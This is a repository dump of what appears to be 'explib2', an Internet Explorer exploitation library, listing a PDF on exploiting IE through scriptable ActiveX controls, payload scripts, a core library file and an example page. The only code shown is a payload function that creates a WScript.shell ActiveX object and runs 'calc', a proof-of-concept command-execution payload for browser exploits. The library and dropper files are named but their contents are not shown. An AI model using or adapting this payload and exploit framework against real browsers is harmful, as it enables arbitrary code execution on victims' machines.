├── Exploit IE Using Scriptable ActiveX Controls.pdf ├── payload ├── exec.js └── drop_exec.js ├── .gitattributes ├── example.html ├── .gitignore └── lib └── explib2.js /Exploit IE Using Scriptable ActiveX Controls.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rolinston/explib2/HEAD/Exploit IE Using Scriptable ActiveX Controls.pdf -------------------------------------------------------------------------------- /payload/exec.js: -------------------------------------------------------------------------------- 1 | function payload_exec(cmd) { 2 | 3 | this.execute = function(explib) { 4 | 5 | var WshShell = new ActiveXObject("WScript.shell"); 6 | var oExec = WshShell.Exec("calc"); 7 | } 8 | 9 | return this; 10 | } -------------------------------------------------------------------------------- /.gitattributes: -------------------------------------------------------------------------------- 1 | # Auto detect text files and perform LF normalization 2 | * text=auto 3 | 4 | # Custom for Visual Studio 5 | *.cs diff=csharp 6 | *.sln merge=union 7 | *.csproj merge=union 8 | *.vbproj merge=union 9 | *.fsproj merge=union 10 | *.dbproj merge=union 11 | 12 | # Standard to msysgit 13 | *.doc diff=astextplain 14 | *.DOC diff=astextplain 15 | *.docx diff=astextplain 16 | *.DOCX diff=astextplain 17 | *.dot diff=astextplain 18 | *.DOT diff=astextplain 19 | *.pdf diff=astextplain 20 | *.PDF diff=astextplain 21 | *.rtf diff=astextplain 22 | *.RTF diff=astextplain 23 | -------------------------------------------------------------------------------- /example.html: -------------------------------------------------------------------------------- 1 | 2 | 3 |
4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 34 | 35 |